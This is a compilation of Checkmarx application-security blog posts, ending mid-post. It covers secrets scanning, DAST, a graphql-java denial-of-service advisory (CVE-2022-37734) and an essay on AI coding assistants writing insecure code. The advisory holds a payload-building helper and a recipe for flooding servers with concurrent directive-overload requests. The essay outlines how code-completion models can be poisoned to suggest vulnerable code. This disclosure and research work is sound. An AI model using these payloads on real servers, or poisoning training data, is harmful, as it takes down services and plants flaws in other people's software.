Application Security Testing: The world runs on code. We secure it.

Secrets, Secrets Are No Fun. Secrets, Secrets (Stored in Plain Text Files) Hurt Someone
https://checkmarx.com/blog/secrets-secrets-are-no-fun-secrets-secrets-stored-in-plain-text-files-hurt-someone-2/ Thu, 27 Apr 2023 13:00:00 +0000

Secrets are meant to be hidden or, at the very least, known only to a specific and limited set of individuals (or systems). Otherwise, they aren’t really secrets. In personal life, a secret revealed can damage relationships, lead to social stigma, or, at the very least, be embarrassing. In a developer’s or application security engineer’s professional life, the consequences of exposing secrets can include security breaches and data leaks and, well, also be embarrassing. And while there are tools available for detecting secrets in source code and code repositories, there are few options for identifying secrets in plain text files, documents, emails, chat logs, content management systems, and more.

What Are Secrets? 

In the context of applications, secrets are sensitive information such as passwords, API keys, cryptographic keys, and other confidential data that an application needs to function but should not be exposed to unauthorized users. Secrets are typically stored securely and accessed programmatically by the application when needed. 

The use of secrets is an essential aspect of securing applications. Unauthorized access to these sensitive pieces of information can lead to security breaches and other malicious activities. To protect secrets, developers, system administrators, and security engineers use a variety of security techniques such as encryption, secure storage, and access control mechanisms to ensure that only authorized users can access them. Additionally, they implement best practices such as regularly rotating passwords and keys and limiting the scope of access to secrets to only what is necessary for the application to function. 

Secrets in the Software Supply Chain 

Secrets are a critical component of software supply chain security, which spans everything from collaboration to deployment, and all points in between.

As an example, Confluence is a popular collaboration tool used by many organizations to store and share information and can be a common source of secret leaks. This is because Confluence allows anyone with access to a page to view its contents, including sensitive information like API keys and passwords (see image below). Additionally, users may accidentally expose secrets by copy-pasting them into Confluence pages or by including them in code snippets or in stored configuration files.  

A secret, such as an access key or password, is often the only thing standing between an attacker and sensitive data or systems. Therefore, it’s essential to keep these secrets confidential and secure. When secrets are compromised, it can lead to a devastating data breach, which can cause significant financial and reputational damage to an organization.  

Secrets are a frequent target of software supply chain attacks. Attackers often target secrets to gain access to enterprise systems, data, or servers. They can easily obtain these secrets if they have been mistakenly leaked to a public source. Safeguarding secrets in software supply chain security is essential to ensure that attackers cannot exploit them to compromise enterprise systems and data. Proper secret management can help prevent unauthorized access to critical systems and data, protecting organizations from supply chain attacks.

How Do You Keep Secrets Secret? 

To protect against secrets being leaked, you can employ the following practices: 

  1. Use environment variables to store secrets: Instead of hardcoding secrets in your code, store them in environment variables. This makes it easier to manage secrets and ensures that they are not accidentally committed to a code repository. 
  2. Use a .gitignore file: Create a .gitignore file to exclude files that contain secrets from being tracked by Git. This will prevent sensitive information from being accidentally committed to a code repository. If following #1 above and secrets are stored in an environment variable file, make sure that file is specified in .gitignore. 
  3. Use a secrets management tool: A secrets management tool can help securely store and manage application or system secrets. This ensures that secrets are encrypted and only accessible by authorized users. 
  4. Use encryption: Encrypt secrets before storing them in code repositories. This provides an extra layer of security and makes it more difficult for attackers to access sensitive information. 
  5. Use two-factor authentication (2FA): Enable 2FA for code repositories to prevent unauthorized access. This adds an extra layer of security and makes it more difficult for attackers to gain unauthorized access to a code repository. 
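As a minimal sketch of practice #1, here is how an application might read a secret from the environment instead of hardcoding it. This is illustrative only; the variable name `API_KEY` is a hypothetical example, not something from the article.

```python
import os

def get_api_key() -> str:
    """Read a secret from the environment instead of hardcoding it.

    API_KEY is a hypothetical variable name used for this sketch.
    """
    key = os.environ.get("API_KEY")
    if key is None:
        # Fail fast rather than falling back to a hardcoded default,
        # which would defeat the purpose of externalizing the secret.
        raise RuntimeError("API_KEY is not set; refusing to start")
    return key
```

If the secret is loaded from a local `.env` file during development, that file is exactly what practice #2 says to list in `.gitignore`.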

By following these best practices, you can protect yourself from accidentally exposing sensitive information in your code repositories and source control managers. But what about other systems, such as content management systems, plain text documents, emails, chat logs, and other digital assets not stored in a repository? 

Introducing Too Many Secrets by Checkmarx 

Too Many Secrets (2MS) is an open source project dedicated to helping people protect their sensitive information like passwords, credentials, and API keys from appearing in public websites and communication services. 2MS supports Confluence today and we will soon be adding support for Discord. In addition, it’s easily extensible to other communication or collaboration platforms as well. 

Installing and running 2MS is extremely quick and simple. 2MS is built in Go, so all you need to do is clone the repository, build the project, and run the binary against your platform. Below is the list of commands I used to get up and running on OSX (using Bash 5.1.16): 

# brew install go
# git clone https://github.com/Checkmarx/2ms.git
# cd 2ms
# go build
# ./2ms --confluence https://<MyConfluence>.atlassian.net/wiki --confluence-spaces <MySpace> --confluence-username <MyUsername> --confluence-token <MyToken>

2MS is built on a secrets detection engine (currently gitleaks) and includes various plugins to interact with popular platforms. This means anyone in the open source community can contribute, improve, and extend 2MS quite easily. 
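At its core, a secrets detection engine is pattern matching over text. The toy sketch below illustrates the concept only; these regexes are simplified stand-ins, not the actual gitleaks rule set, which ships many tuned rules plus entropy checks to reduce false positives.

```python
import re

# Simplified, illustrative patterns. Real engines such as gitleaks use
# far more rules and additional heuristics (entropy, keywords, paths).
RULES = {
    "aws-access-key-id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "generic-password": re.compile(r"password\s*[:=]\s*\S+", re.IGNORECASE),
}

def scan(text: str) -> list[tuple[str, str]]:
    """Return (rule_name, matched_text) pairs found in the input text."""
    findings = []
    for name, pattern in RULES.items():
        for match in pattern.finditer(text):
            findings.append((name, match.group(0)))
    return findings
```

A plugin for a platform like Confluence would then simply fetch page content and feed it through `scan`, which is why extending such a tool to new platforms is mostly a matter of writing a new content fetcher.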

Learn More 

We believe that by working together, we can create a more secure digital world. To learn more or download the project yourself, head over to https://github.com/Checkmarx/2ms on GitHub. 

Shift EVERYWHERE With Checkmarx One and DAST
https://checkmarx.com/blog/shift-everywhere-with-checkmarx-one-and-dast/ Thu, 27 Apr 2023 13:00:00 +0000

In the early days of application security, every organization looking to secure its applications relied on just two types of scanning engines: SAST to analyze and secure source code, and DAST to test against a deployed, running application. 

This approach has changed in today’s AppSec world, as there is a need for a platform that offers a wide range of scanning engines fitting the multiple domains of modern application development, such as SAST, SCA, Infrastructure as Code, and API security. Also, due to the speed and complexity of modern application development, it has become imperative that any scanning engine fit seamlessly into the developer’s pipeline so as not to interrupt workflows or delay delivery.  

And, admittedly, it is this trend of modern application development that has resulted in some AppSec experts moving away from DAST and other runtime solutions to focus on pre-deployment scanners, such as SAST and SCA. 

However, this trend is about to change again. Not only does Checkmarx One offer all the scanning engines that one would expect (and then some, such as supply chain security, IaC security, and API security), but our approach to DAST is set to bring it back into the mainstream. 

Getting Started with DAST 

Creating Environments and Running a Scan 

Since DAST executes against a running application, we need to create an Environment to define the application to be tested. This is where the environment’s name, URL, and type (web or API) are defined along with optional fields for tags and groups: 

Checkmarx One supports both web and API environment types. API environments have additional fields to upload API documentation files and link the environment to a project. See the API Security Integration section for more details.  

You can initiate a DAST scan either manually via the Checkmarx One portal (which we will cover in this section) or using the DAST CLI, which can be run independently or as a part of a build pipeline. 

After you create the environment, it will be visible in the environments list and ready to scan: 

Hovering over the environment will reveal an action menu where we can start a scan, review results, and copy the environment ID (needed for pipeline integration). 

Selecting the scan option will open the new scan wizard where a configuration file is provided to define scan settings, user accounts, authentication method, etc.  

After providing the configuration file, we are ready to begin the scan: 

We can then use the View action to dive into the scan results: 

API Security Integration 

As we mentioned above, one of the key synergies in Checkmarx One is the correlation between API Security and DAST, where DAST can leverage the APIs that were discovered by API Security to drive the coverage of the DAST API scan. 

It is easy for users to link a DAST API environment with a Checkmarx One project to automatically consume any API Security results. We simply need to select a project in the project drop-down: 

Viewing Checkmarx One DAST Results 

And finally, let’s look at how to review and triage our DAST results, which we can dive into using the environment’s View option: 

Individual findings can be investigated in detail by clicking on the issue itself. Here, on the risk detail page, we can find more information about the vulnerability, such as its risk score, method, parameters, and attack string, as well as a detailed description of the vulnerability type along with resolution and remediation advice: 

And most importantly, each DAST vulnerability also includes Evidence, with a quick link to copy the request and attack string to your local clipboard; this allows for easy validation of results: 

Learn more 

To learn more about Checkmarx DAST, you can see it in action here or contact your Checkmarx account team. 

It’s Here: The Global Pulse on Application Security Report
https://checkmarx.com/blog/its-here-the-global-pulse-on-application-security-report/ Tue, 25 Apr 2023 16:13:37 +0000

The application security landscape is in a state of constant flux. Tools that were once sufficient for securing your applications may no longer be enough.

To better understand the state of application security, including present and future development trends, we surveyed more than 1,500 CISOs, AppSec managers, and developers worldwide in partnership with an independent research agency, Censuswide, and reviewed internal data from Checkmarx One™ — our cloud-based application security platform. 

After evaluating the internal and external findings, we were able to identify common tendencies amongst roles and draw conclusions around topics such as AppSec scan use, secure code training practices, development practices, budget constraints, and digital transformation efforts.

We hope that you take the time to comb through our second annual ‘Global Pulse on Application Security‘ report, but in the meantime, here’s a small sampling of the findings.

Modern development practices bring modern risks

There’s been an ongoing trend in application security over the past few years: the need for speed. As we saw in this year’s Global Pulse on Application Security report, technological advances and increased connectivity have heightened reliance on software, especially applications. To keep up with consumer demands and remain competitive in the software space, enterprises are prioritizing speed to market through digital transformations and modern development tactics such as increased use of open source libraries, APIs, microservices, and containers.

But new approaches to hosting, building, and deploying applications bring new risks and attack surfaces. In fact, 88% of organizations experienced at least one breach in the past 12 months — most of which were the direct result of modern development practices [shown below in Figure 1 from the report].

Vulnerabilities are found throughout the software development life cycle

A few years ago, “shift left” was the mantra that every development and security team lived by. But is that still the right approach?

Our report uncovered that vulnerabilities are found throughout the software development life cycle (SDLC), not only in the beginning phases.

“60% of vulnerabilities are detected during the code, build, or test phases, and 40% are found during the production phase.”

What does this finding mean? By shifting AppSec testing to the left and only testing at the beginning of the SDLC, you could miss vulnerabilities further down the line, like in production.

Organizations are not satisfied with their current AppSec testing tools and plan to make changes

The secret is out: 98% of software developers are not satisfied with their security testing tools. The survey revealed that the most common complaints around testing tools include “way too many false positives,” and “no correlation of scan results,” among others.

It also doesn’t help that most AppSec testing tools do not easily integrate and automate into developers’ existing tools and processes.

“Only 34% of developers responded that their AppSec scans are completely integrated and automated into their SCMs, IDEs, and CI/CD tooling.”

With discontent around testing tools from developers, it comes as no surprise that 99% of AppSec managers plan to add new testing solutions or strategies over the next 12 months.

Responses show a need for an AppSec platform in order to ‘shift everywhere’

From the findings, it’s safe to surmise that organizations developing modern software need to take a step back and look holistically at their application security. For starters, application security needs to be embedded into every phase of the SDLC, not just at the beginning. In other words, organizations should not only shift left but also shift right, a concept referred to as “shifting everywhere.”

By shifting AppSec everywhere, organizations can find and fix vulnerabilities faster, significantly reducing time to market and lowering costly rework to remediate vulnerabilities. This helps ensure that new technologies and architectures are secure.

The findings in this year’s ‘Global Pulse on Application Security’ report also point to the importance of a cloud-based platform approach. By having all of your AppSec testing tools with one vendor on a unified platform, development teams can seamlessly integrate scans into their CI/CD pipelines and defect-tracking systems, creating better automation and a more efficient feedback loop. Empowering developers to be in the driver’s seat with AppSec initiatives not only helps foster a stronger relationship between development and security teams but also frees up the security team to concentrate on product security.

One unified AppSec platform, like Checkmarx One™ , can also help organizations to prioritize vulnerabilities. Checkmarx One offers unique scan correlation capabilities that provide actionable insights into vulnerabilities across scan types and applications so you know what fixes will make the greatest impact in the shortest period of time. And given that Checkmarx One offers testing tools to reduce risk across all components of modern software — including proprietary code, open source, APIs, and Infrastructure as Code — there’s no need to juggle multiple AppSec vendors.

Ready to dig deeper?

We hope you’ll explore the ‘Global Pulse on Application Security’ report to learn additional insights from your industry peers and to inform the decisions you make about your own AppSec program.

Get the full report.

3 Financial Services Trends and How They Affect Your Application Security
https://checkmarx.com/blog/3-financial-services-trends-and-how-they-affect-your-application-security/ Mon, 24 Apr 2023 22:22:51 +0000

Learn how Checkmarx and AWS have partnered to help your financial services firm adapt to the evolving landscape.

The way we bank has changed beyond recognition. Where transactions once took place in person within the walls of impressive buildings, we now see mobile and online banking on the rise. Anywhere, anytime, palm-of-your-hand banking is the norm, and our expectations are shaped by the seamless, personalized app experiences that have become the default in the digital universe. At the same time, the global acceleration of digital banking licenses has created a new competitive landscape populated by fast-moving market entrants and born-in-the-cloud providers.

One thing that hasn’t changed, though, is the position of trust at the cornerstone of the banking system. Indeed, in today’s volatile economic and cybersecurity environment, building brand trust is more important than ever. Whether you are a legacy brand or a new market entrant, any lack of trust compromises your ability to succeed.

So financial services firms face a continuing challenge: how to innovate at the speed required without compromising customer safety and system security? Most are turning to the cloud for answers. Its flexibility and scalability are making it central to financial service organizations’ efforts to embrace new trends and deliver innovative services at pace.

AWS has some intriguing solutions to meet the challenge. The cloud leader provides a full suite of services to help banks achieve the agility to thrive in the digital age, while certified partners such as Checkmarx ensure the security of the applications and services banks develop.

Recently, the team at AWS identified seven key trends that are impacting the financial services industry. Here we take a deep dive into three areas where AppSec is highly relevant and explore what they mean for the sector.

Trend 1: Customer experience — speed and security must be dual priorities

Today, economic power is passing to a digital-native generation with little loyalty to legacy banking brands and great expectations of how personal and business financial services should perform. This means customer experience is the modern commercial battleground. Banking must be hyper-personalized and service-led. Increasingly, banking is integrated into consumers’ day-to-day journeys through embedded financial services within trusted brands such as Starbucks and Uber.

Banks are leaning heavily on AI and machine learning to predict customer needs through analysis of internal and external datasets, while the omnichannel drive continues through solutions such as authentication based on voice recognition, real-time sentiment analysis of customer service calls, chatbot support, and automated self-service options.

AWS supports these initiatives and many more through cloud-powered big data analysis that allows banks to leverage AI and machine learning on a massive scale. It also, in its own words, “helps compress time to innovation and, ultimately, time to value, by facilitating rapid development, testing, and deployment to produce new ideas and customer propositions.”  

AWS allows banks to accelerate innovation through its cloud-native application development services, but they also need to ensure the code they create is secure and resilient. Achieving application security assurance without putting a brake on delivery speed is crucial. However, a recent Checkmarx survey of banking and insurance CISOs found that 84% of respondents undergoing digital transformation and implementing a cloud-native strategy were concerned about secure application development and deployment.

As an AWS accredited partner, Checkmarx understands that security must work at the speed of DevOps. The Checkmarx One™ Application Security Platform is designed for the cloud development generation and delivered from the cloud, bringing integrated one-click AppSec testing that allows financial services companies to deploy more secure code — fast.

Trend 2: Ecosystem-based banking and banking-as-a-service APIs take center stage

The open banking era is unlocking the doors to greater innovation and collaboration. Providers can now seize new opportunities to develop products that blur the boundaries between different types of financial services. They are establishing solutions that offer their banking services, including fully managed banking propositions, to third parties securely via microservices and a common platform.

AWS identifies two key approaches to this trend. The “marketplace” approach sees banks providing “value-added and contextualized services to their customers such as ERP integrations or personal finance management.” The aim is to deepen the relationship with individual and business customers beyond basic service provision.

The “banking-as-a-service” approach sees banks offering a range of services — from standalone specific regulatory-driven services like Know Your Customer’s Customer (KYCC) to fully managed offerings that let any organization set up a branded banking service.

Center-stage in both approaches are the bank’s APIs, designed to allow banking products and services to be distributed to customers and third parties. Modernizing API architecture in the cloud accelerates the development and testing of APIs, making them easier to integrate as well as providing scalability.

Checkmarx API security offers banks and their customers and partners a crucial service that helps discover, control, and mitigate API security risk. It offers complete visibility into your API inventory and identifies vulnerabilities and misconfigurations. Controlling API risk is an essential component of developing financial marketplace ecosystems and banking-as-a-service solutions.

Trend 3: Cyber event recovery — reducing the attack surface and responding to regulatory requirements

Given its nature, it is not surprising that the financial services sector faces more cyberattacks than any other. On top of these external incursions comes the disruption of digital transformation, which can also create vulnerabilities including third-party and supply chain risk.

Banks are investing in a range of measures designed to manage and mitigate risk and accelerate recovery from any attack. Reducing the attack surface and minimizing vulnerabilities is an essential activity if the sector is to safeguard its reputation and maintain customer trust. Additionally, the growing library of regulations designed to ensure banks are meeting their security obligations means they need to adopt solutions that support compliance.

AWS offers a wealth of solutions to ensure client data is protected and banks can recover quickly from attacks. These include Amazon Simple Storage Service (Amazon S3), key management services, software-defined firewalls that facilitate network isolation, and geographic sovereignty solutions that meet compliance requirements.

These and many other offerings take care of Amazon’s part of the shared security bargain; however, banks are also responsible for securing the workloads they deploy in AWS. This is where Checkmarx steps in, providing comprehensive AppSec solutions that integrate seamlessly with AWS SDLC tools to secure the entire process. Checkmarx addresses all types of application risk, from custom code errors to open source component vulnerabilities, API risks, and infrastructure as code misconfigurations.

These are dynamic times for financial services firms, and AWS with Checkmarx are helping them capitalize on opportunities while defending against threats — both malicious and competitive.

Interested in learning more?

We’re exploring these trends in detail in our webinar on May 4, 2023, where AWS and Checkmarx will explain how you can turn AppSec into a competitive advantage as you continue your cloud transformation journey.

REGISTER FOR THE WEBINAR

CVE-2022-37734: graphql-java Denial-of-Service
https://checkmarx.com/blog/cve-2022-37734-graphql-java-denial-of-service/ Thu, 30 Mar 2023 12:49:09 +0000

GraphQL is an API standard said to be a more efficient and flexible alternative to REST and SOAP. One of the main purposes of a GraphQL server is to process incoming data.

One of the most challenging tasks for developers who work with GraphQL servers is Denial-of-Service (DoS) protection. Directive overloading (submitting multiple directives) is one of the DoS vectors to be concerned about.

Directives are used to dynamically change a query’s structure and shape using variables. If the context in which directives are used is not clear, don’t worry; it isn’t important for understanding this vulnerability. To learn more about directives and directive overloading, check our blog post: https://checkmarx.com/blog/alias-and-directive-overloading-in-graphql/

Vulnerable software

graphql-java is the most popular GraphQL server written in Java. It was found to be vulnerable to DoS attacks through directive overloading.

Moreover, the spring-graphql library by Spring and the dgs-framework library by Netflix use it as a core component. Therefore, they are also vulnerable if the core component is outdated. To understand the scale of the problem, it’s worth mentioning that graphql-java is the number one library among Maven’s top GraphQL servers and is used by 355 libraries.

The vulnerability was fixed in two stages. The first fix introduced a security control, whereas the second one targeted the root cause. The first fix is present in graphql-java versions 19.0 and later, 18.3, and 17.4.

The second fix was applied in version 20.1.

Exploitation and Impact

The vulnerability can be exploited by sending a crafted GraphQL request. The request contains a huge number of non-existent directives.

The example demonstrated below is based on the spring-graphql GraphQL server that uses the unpatched graphql-java version.

Request example:

@aa is a non-existent directive. The processing time of this request is only about 100 ms, whereas adding a large number of directives drastically increases the execution time. The screenshot below shows that a request with 1,000 directives executes in 189 ms; 3,000 in 447 ms; 5,000 in 963 ms; 7,000 in 1.7 seconds; 10,000 in 3 seconds; and 15,000 in 5.4 seconds:
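A payload of this shape is easy to reproduce with a short helper. This is a sketch; the query body is an illustrative example, not the exact request from the article's test setup:

```python
def build_overload_query(n: int, directive: str = "aa") -> str:
    """Build a GraphQL query whose field carries n copies of a
    non-existent directive, e.g. '@aa @aa @aa ...'."""
    directives = " ".join(f"@{directive}" for _ in range(n))
    return "query { __typename %s }" % directives
```

Posting `build_overload_query(n)` to a vulnerable endpoint with growing `n` (1,000 then 5,000 then 15,000) reproduces the superlinear growth in response time described above.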

The time of execution increases with the number of directives. By launching 50 concurrent malicious requests with 30,000 directives each, the server becomes unavailable:

As a result of this attack, the server became unavailable and all of its CPU resources were exhausted. In other words, an attacker can exhaust all of a server’s CPU resources by sending 50 concurrent requests from a single attacking machine.

Root cause

Two Denial-of-Service protections had been added before the discovery of this vulnerability in the following pull requests:

These protection mechanisms are triggered when an attacker submits a big query; they limit the number of parsed tokens and validation errors.

And the limit works. After submitting more than 15000 tokens, the following error occurs:

{
  "errors": [
    {
      "message": "Invalid Syntax : More than 15000 parse tokens have been presented. To prevent Denial Of Service attacks, parsing has been cancelled. offending token '@' at line 2 column 22511"
    }
  ],
  ...
}

However, as seen in the example above, the execution time increases even before more than 15,000 tokens are provided. This means the DoS occurs before the code reaches the token limit.

The problem resides in query recognition by the ANTLR4 lexer. The graphql-java developer bbakerman mentions:

Testing showed that the max token code was indeed being hit, but the ANTLR lexing and parsing code was taking proportionally longer to get to the max token state as the input size increased

This is caused by the greedy nature of the ANTLR Lexer – it will look ahead and store tokens in memory under certain grammar conditions.

Graphql-java uses ANTLR4 for decomposing GraphQL queries to lexical tokens. The code line that raises the DoS vulnerability is located in the file graphql/parser/Parser.java:

The call chain goes to the file graphql/parser/antlr/GraphqlParser.java.

This file is generated automatically by ANTLR and is based on the grammar file Graphql.g4. The file with the .g4 extension contains the grammar for the ANTLR parser. The file imports other g4 files, and they all describe how ANTLR should parse GraphQL queries.

Further investigation of ANTRL files revealed the vulnerable pattern. The pattern causing the DoS vulnerability in GraphQL grammar is a classic “don’t.” The following rule is located in the GraphqlSDL.g4 file:

...
schemaExtension :
    EXTEND SCHEMA directives? '{' operationTypeDefinition+ '}' |
    EXTEND SCHEMA directives+
;

And the directives rule is described in the file GraphqlCommon.g4:

directives : directive+;
directive : '@' name arguments?;

The rule called directives is repetitive and, additionally, applies repetition to the directive sub-rule. Nested repetition leads to DoS risk. This issue can be compared with an “evil” regex.

It’s worth mentioning that the schemaExtension rule is not even used to recognize the query. This happens because the directives rule uses the adaptivePredict method in the ANTLR-generated code.

The adaptivePredict algorithm is context-free by default, but in case of ambiguity it falls back to a context-sensitive analysis to proceed with the recognition. This is especially relevant when a rule has a repetition operator, since ANTLR can only decide which state to transition to after looking ahead until the end of the repetition. This lookahead wouldn’t be a problem for a single repetition, since ANTLR only performs the analysis once per loop. However, the code contains nested repetition, which causes ambiguity inside both repetitions.

Fix #1

The diff for fixed code: https://github.com/graphql-java/graphql-java/pull/2892/files#diff-f9fc01d56c3bffa9c70fee9c9b3ad888d6890b84d774c20a99b2526b31500ab8

The idea behind the fix is the same as the DoS protection just mentioned: stop parsing the query if it contains more than 15,000 tokens (a configurable default). This time, the check is performed before passing the query to ANTLR processing.

The main changes in the graphql/parser/Parser.java file:

SafeTokenSource class is introduced to verify that the number of tokens in the query doesn’t exceed a threshold. It prevents a malicious query from being stuck by throwing an exception when a threshold is reached.
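The concept behind SafeTokenSource can be sketched as a counting wrapper around the token stream. Note this is a Python sketch of the idea only; the real class is Java code inside graphql-java, and the class and exception names here are illustrative:

```python
class TooManyTokensError(Exception):
    """Raised when the token budget is exceeded, mirroring the idea of
    aborting before expensive downstream parsing runs."""

class SafeTokenSource:
    """Wrap a token iterator and abort once a threshold is exceeded."""

    def __init__(self, tokens, max_tokens: int = 15_000):
        self._tokens = iter(tokens)
        self._max = max_tokens
        self._count = 0

    def __iter__(self):
        return self

    def __next__(self):
        token = next(self._tokens)  # StopIteration ends a benign query
        self._count += 1
        if self._count > self._max:
            raise TooManyTokensError(
                f"More than {self._max} parse tokens have been presented"
            )
        return token
```

Because the counter sits in front of the parser, a malicious query is rejected in O(threshold) work regardless of how pathological the grammar's behavior on it would have been.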

Additional research on the fixed version showed that the fix protects a graphql-java server only against a single-threaded attack. An attacker can no longer send a single query with a huge number of “evil” directives; however, sending multiple requests simultaneously (50-100+ threads), each containing a large but allowed number of directives, still leads to DoS, since the root cause of the vulnerability was still there.

Fix #2

The second fix targets the root cause. These changes fix the nested repetition of directives in the rule schemaExtension.

This is the changed code in the file src/main/antlr/GraphqlSDL.g4:

To fix the nested repetition, it is enough to delete the + (plus) sign after directives. This also requires changing how the schema is parsed in the file src/main/java/graphql/parser/GraphqlAntlrToLanguage.java.
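A simplified illustration of the kind of change (rule bodies abbreviated and hypothetical, not the actual GraphqlSDL.g4 text):

```antlr
// Before (simplified): directives+ repeats a rule that is itself a
// repetition of directive, i.e. nested repetition.
schemaExtension : EXTEND SCHEMA directives+ ;
directives      : directive+ ;

// After: drop the '+' on directives so only one level repeats.
schemaExtension : EXTEND SCHEMA directives ;
directives      : directive+ ;
```

With a single level of repetition, adaptivePredict no longer has to resolve an ambiguous split between two loops.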

After applying the fix, a significant difference in execution time between the first and the second fixes can be observed:

The utilized payload, @aa, produces two tokens per directive. As shown in the screenshot above, 7,000 such directives stay below the 15,000-token limit and consume far more resources when the second fix is not applied. Execution times become similar from 8,000 directives on, because at that point the first fix rejects the query (more than 15,000 tokens) without parsing it. The second fix eradicates the root cause and prevents a DoS regardless of the payload size.

The changes above were applied in the pull request: https://github.com/graphql-java/graphql-java/pull/3071

From Zero to AppSec Anti-Hero: How AI Brings More Security Issues Than It Fixes https://checkmarx.com/blog/from-zero-to-appsec-anti-hero-how-ai-brings-more-security-issues-than-it-fixes/ Fri, 17 Mar 2023 07:00:00 +0000 https://checkmarx.com/?p=82016 AI is now being pushed, if not forced, into software development by “helping” developers write code. With this push, developers’ productivity is expected to increase, along with the speed of delivery. But are we doing it right? Did we not, in the past, also push other tools and methodologies into development to increase the speed of development? The Waterfall Model, for example, was not very flexible when it came to security. [1] That push created more security issues than it solved, because security is always the last thing to think of. We can see the same pattern all over again with AI used to develop software.

Code Completion Assistants

Tabnine, GitHub Copilot, Amazon CodeWhisperer, and other AI assistants are starting to be integrated into developers’ coding environments to help increase their speed of writing code. GitHub Copilot, described as your “AI pair programmer”, is a language model trained on open-source GitHub code. The data it was trained on, open-source code, usually contains bugs that can develop into vulnerabilities, and given this vast quantity of unvetted code, it is certain that Copilot has learned from exploitable code. That is the conclusion some researchers reached: according to their paper, which created different scenarios based on a subset of MITRE’s CWEs, 40% of the code generated by Copilot was vulnerable.[2]

Figure 1- Creating a profile page with PHP

The GitHub Copilot FAQ states that “you should always use GitHub Copilot together with good testing and code review practices and security tools, as well as your own judgment.” Tabnine makes no such statement, but CodeWhisperer states that it “empowers developers to responsibly use artificial intelligence (AI) to create syntactically correct and secure applications.” That is a bold statement which, in reality, is not true. I tested CodeWhisperer in the Python Lambda function console, and the results were not promising. Figure 2 is an example of CodeWhisperer generating code for a simple Lambda function that reads and returns a file’s contents. The issue is that the code is vulnerable to Path Traversal attacks.

Figure 2- Creating a Lambda Function to read and return a file content
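For contrast, a minimal sketch of how such a handler could validate the requested path before reading it (SAFE_ROOT and the directory layout are hypothetical; the vulnerable code itself is in the screenshot above):

```python
import os

# Hypothetical directory the function is allowed to serve files from.
SAFE_ROOT = os.path.realpath("/var/task/files")

def read_file(user_path):
    """Resolve the requested path and refuse anything that escapes
    SAFE_ROOT -- the validation the generated handler was missing."""
    full = os.path.realpath(os.path.join(SAFE_ROOT, user_path))
    # Both "../.." sequences and absolute paths fail this prefix check.
    if not full.startswith(SAFE_ROOT + os.sep):
        raise ValueError("path traversal attempt blocked")
    with open(full) as f:
        return f.read()
```

The key point is resolving the path first (realpath) and comparing against the allowed root, rather than trusting the user-supplied string.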

Taking a step back, these AI assistants need data to be trained on, and they need to understand the context in which the code is being inserted. The data used to train the models is, in most cases, open-source code, which, as stated before, often contains vulnerable code. Figure 3, Figure 4, and Figure 5 show examples of public repositories with vulnerabilities that were already found but never fixed. In addition, there is another factor to take into consideration: supply chain attacks. What happens if attackers can compromise the model? Are these assistants also vulnerable to attacks? Theoretically, by creating a significant number of repositories with vulnerable code, a malicious actor may be able to taint the model into suggesting vulnerable code, since “GitHub Copilot is trained on all languages that appear in public repositories.”

Figure 3 – Four vulnerability issues in yf-exam repo
Figure 4 – Path Traversal in Dice repo
Figure 5 – Unsafe deserialization in Serving repo

In the “You Autocomplete Me: Poisoning Vulnerabilities in Neural Code Completion” paper, researchers demonstrated that natural-language models are vulnerable to model and data poisoning attacks. These attacks “trick the model into confidently suggesting insecure choices in security-critical contexts.” The researchers also present a new class of “targeted poisoning attacks” to affect certain code completion model users.[3]

These attacks, combined with supply chain attacks, may enable malicious actors to devise a set of targeted attacks to affect the models into suggesting vulnerable contexts. And these contexts do not need to be an SQLi, they can be subtle code logic that may enable authentication/authorization bypasses for example.

The elephant in the room, ChatGPT

ChatGPT is the chatbot that everyone is talking about, considered to be the “next big thing” by a large number of people. It uses a model trained with Reinforcement Learning from Human Feedback (RLHF): “human AI trainers provided conversations in which they played both sides—the user and an AI assistant.” [4] According to a Forbes article, “On the topic of ChatGPT3, he [Yann] essentially said that ChatGPT is ‘not particularly innovative,’ and ‘nothing revolutionary’. Yes, it will provide information that over time as it will be incredibly accurate as it will be cleansed more, misinformation will be extracted, but it will never have any common sense in being able to look ahead and easily recognize multiple sensory patterns.“[5]

Nonetheless, the chatbot rocked the tech world with its ability to produce code on request, solve certification exams, and provide insights on security topics. It generated a state of panic everywhere, but should we really be worried? We should, not because of its abilities, but because of its inabilities. ChatGPT is able to write code, but not secure code. I asked the bot to generate a simple application in three different languages and analyzed the results.

The Old School Language

Although the C language is not as popular as other languages, it is still the language that allows developers to create anything; it only takes some patience and time. So why not start looking for examples in C? I asked the chatbot to create a simple C application that reads an input from the console and prints it.

While the generated code is pretty simple, it is vulnerable to a buffer overflow in the scanf call. According to the scanf documentation, “the input string stops at white space or at the maximum field width, whichever occurs first.” Since no maximum field width is defined, it will read until it finds whitespace, regardless of the destination buffer’s size.

Maybe if we ask ChatGPT if the code is vulnerable, it is able to spot the buffer overflow?

It does recognize that the scanf is vulnerable to a buffer overflow, but what if we ask it if the code is vulnerable to string format attacks?

Using the same C code that it generated, ChatGPT answers with confidence that the code is vulnerable. A total miss: the code is not vulnerable to string format attacks. It looks like the bot is trying to agree with us, and only after telling it that the printf has the %s format specifier does it admit the mistake.

The Hip Language

What about code in the language that everyone knows and that has plenty of content written about it, Python? I asked it to create a Flask app that provides the ability to upload and download files.

The code looks correct, and it runs, but the upload endpoint contains a Path Traversal vulnerability. Debug mode is also on, an insecure configuration that could be considered normal since the app is in its “initial stages”, but ChatGPT does not warn about the potential dangers of leaving it enabled.

And is the bot able to spot the vulnerability and the security misconfiguration?

Now it does warn about the debug mode, and it also says that there is an issue with the contents of the uploaded files. Although that is indeed dangerous, it cannot be considered a vulnerability; it is a weakness in the code. It would become a vulnerability if the file were processed.

Nonetheless, it completely missed the Path Traversal, probably because the path.join looks secure, but it is not.
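The reason os.path.join only looks secure is a documented but often-overlooked behavior: if any component is an absolute path, everything before it is discarded. A quick demonstration (the upload directory name is hypothetical):

```python
import os

# Joining a relative filename behaves as expected:
print(os.path.join("/var/uploads", "report.txt"))   # /var/uploads/report.txt

# But an absolute component silently discards the base directory,
# so a user-supplied "/etc/passwd" escapes the upload folder entirely:
print(os.path.join("/var/uploads", "/etc/passwd"))  # /etc/passwd

# "../" components are kept verbatim too, and escape once resolved:
print(os.path.join("/var/uploads", "../../etc/passwd"))
```

This is why joined paths must still be resolved (e.g., with os.path.realpath) and checked against the intended base directory.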

The Disliked Language

Maybe, generating safe code for the language that was, and probably still is, the backbone of the Internet will be easier. Maybe?

I asked ChatGPT to create a PHP app that logs in a user against a database and redirects to a profile page.

